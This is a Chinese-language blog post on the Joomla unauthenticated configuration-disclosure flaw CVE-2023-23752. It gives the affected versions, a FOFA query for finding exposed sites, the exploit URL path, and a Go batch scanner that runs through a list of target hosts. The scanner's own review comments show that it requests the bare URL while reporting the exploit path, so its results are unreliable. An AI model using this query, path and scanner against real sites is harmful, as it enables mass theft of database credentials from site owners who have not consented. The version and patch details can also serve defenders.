JOOMLA未授权访问漏洞(CVE-2023-23752)

受影响版本

  • 4.0 <= Joomla <= 4.2.7(官方已在 4.2.8 中修复,受影响站点应升级至 4.2.8 或更高版本)

fofa查询语句

language:PHP &app="Joomla"

POC

/api/index.php/v1/config/application?public=true

脚本

go批量

package main

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

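// readUrlsFromFile returns the non-empty lines of file, one URL per line.
//
// Every line is trimmed of surrounding whitespace and blank lines are
// dropped, so CRLF line endings and the newline that usually ends a text file
// do not produce "\r"-suffixed or empty entries. If the file cannot be read,
// the error is printed and a nil slice is returned.
func readUrlsFromFile(file string) []string {
	var urls []string
	data, err := ioutil.ReadFile(file)
	if err != nil {
		fmt.Println("read file err:", err)
		return urls
	}
	for _, line := range strings.Split(string(data), "\n") {
		// TrimSpace also strips the "\r" left behind by Windows line endings.
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		urls = append(urls, line)
	}
	return urls
}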

// request sends one GET to url exactly as given and prints a verdict that
// depends on whether the response body contains the substring "password".
//
// NOTE(review): the request is sent to url itself; the
// "/api/index.php/v1/config/application?public=true" suffix is appended only
// to the printed message, so the address reported is not the one fetched.
// NOTE(review): the substring test runs on any response regardless of status
// code or content type, so a positive line is a lead to confirm by hand, not
// proof that configuration data is exposed.
// NOTE(review): the client is built without a timeout, so one unresponsive
// host can stall the whole run.
func request(url string) {
	req, err := http.NewRequest(http.MethodGet, url, nil)
	if err != nil {
		fmt.Println("Request err:", err)
		return
	}
	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36")
	req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")

	resp, err := (&http.Client{}).Do(req)
	if err != nil {
		// Transport errors are dropped without output, so an unreachable
		// host produces no line at all.
		return
	}
	defer resp.Body.Close()

	raw, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println("Read body err:", err)
		return
	}

	reported := url + "/api/index.php/v1/config/application?public=true"
	verdict := "不存在漏洞:"
	if strings.Contains(string(raw), "password") {
		verdict = "存在漏洞:"
	}
	fmt.Println(verdict, reported)
}

// main reads the target list from url.txt in the working directory and
// checks the entries one after another, in file order.
func main() {
	targets := readUrlsFromFile("url.txt")
	if len(targets) < 1 {
		fmt.Println("No URL")
		return
	}
	for i := range targets {
		request(targets[i])
	}
}

joomla1.jpg

goby脚本编写

joomla2.jpgjooml3.jpgjooml4.jpg

文章作者: weehhd
版权声明: 本站所有文章除特别声明外,均採用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 weehhd